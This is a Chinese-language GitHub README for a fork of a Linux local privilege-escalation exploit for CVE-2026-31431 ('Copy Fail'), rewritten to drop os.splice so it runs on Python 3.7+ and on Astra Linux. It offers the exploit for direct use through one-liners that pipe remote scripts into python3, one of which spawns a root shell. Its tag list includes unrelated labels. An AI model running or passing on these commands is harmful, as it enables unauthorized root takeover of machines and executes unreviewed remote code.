p401a-ops/Copy-Fail
GitHub: p401a-ops/Copy-Fail
兼容 Python 3.7+ 的 CVE-2026-31431 本地权限提升漏洞检测与利用工具,解决旧版 Linux 发行版无法运行原版 exploit 的问题。
Stars: 0 | Forks: 0
# CVE-2026-31431 "Copy Fail" - 本地权限提升
## 兼容 Python 3.7+ 的版本(包括 Astra Linux)
安全检查(无漏洞利用):
```
curl -s https://raw.githubusercontent.com/p401a-ops/Copy-Fail/refs/heads/main/detect.py | python3
```
漏洞利用(提示时需要输入用户密码)
```
python3 -c "$(curl -s https://raw.githubusercontent.com/p401a-ops/Copy-Fail/refs/heads/main/exp.py)" --shell
```
## 此漏洞利用版本
**这是一个适配 Python 3.7、3.8、3.9、3.10、3.11 的 fork。**
原版漏洞利用由于使用了 `os.splice()`,因此需要 Python 3.12+。
### 为什么原版无法运行?
```
# ❌ 原始 exploit (仅限 Python 3.12+)
os.splice(fd_in, fd_out, length, offset_src=offset)
# AttributeError: module 'os' has no attribute 'splice'
```
### 此 fork 做了哪些更改?
* 移除了对 `os.splice()` 的依赖
* 增加了对 Python 3.7+ 的兼容性
* 漏洞利用已在 Astra Linux 上通过测试
* 保留了对现代发行版的兼容性
* 增加了简单的 one-liner 运行方式
### 注意事项
* 需要对系统的本地访问权限
* 系统中必须已安装 Python
* 已在 Astra Linux CE/SE 上通过测试
* 无需 Python 3.12+ 即可运行
标签:Astra Linux, Copy Fail, CVE-2026-31431, Exploit开发, Linux提权, POC, Python 3.7兼容性, Python安全脚本, Web报告查看器, 子域名枚举, 本地提权, 漏洞复现, 系统安全, 系统权限提升, 网络安全, 逆向工具, 隐私保护